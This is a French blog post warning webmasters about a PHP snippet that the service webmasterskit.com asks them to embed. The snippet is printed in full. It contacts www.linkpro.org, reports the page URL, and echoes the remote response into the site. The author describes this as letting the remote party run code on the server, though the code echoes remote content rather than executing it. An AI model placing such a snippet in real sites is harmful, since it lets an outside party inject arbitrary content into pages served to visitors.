Webmasterskit une arnaque pour les webmasters
Par Charles Lacroix le vendredi, mai 1 2009, 09:54 - Informatique - Lien permanent
Ce matin je me suis abonné à un site qui s'appelle http://www.webmasterskit.com/ et quand j'ai vu qu'ils voulaient que j'inclus un bout de code php dans mon site j'ai trouvé cela un peu bizarre. J'ai donc continué afin de voir le bout de code php. Je trouve cela très rigolo, et pour certain à première vue ça peut sembler inoffensif mais en réalité, vous leur donnez une porte grade ouverte pour exécuter à peu près n'importe quoi sur votre serveur. Bref méfiez vous des code à inclure dans vos sites web, surtout s'il s'agit de code coté serveur ( php/asp/python/perl et j'en passe )
<?php
@ini_set('allow_url_fopen', 1);
@ini_set('default_socket_timeout', 3);
$path = "/code.php?id=58182&url="
. urlencode($_SERVER['REQUEST_URI'])
. "&urlh=" . urlencode($_SERVER['HTTP_HOST']);
$fp = @fsockopen("www.linkpro.org", 80, $errno, $errstr, 3);
if($fp) {
@fputs($fp,
"GET {$path} HTTP/1.0\r\nHost: www.linkpro.org\r\n\r\n");
while (!feof($fp))
$data .= @fread($fp, 8192);
fclose($fp);
$page = explode("\r\n\r\n", $data);
echo $page[1];
}?>



Commentaires
Je suis tombée sur ton site en faisant une recherche sur ce bout de code.
AUbonlien.com ne m'a pas eue!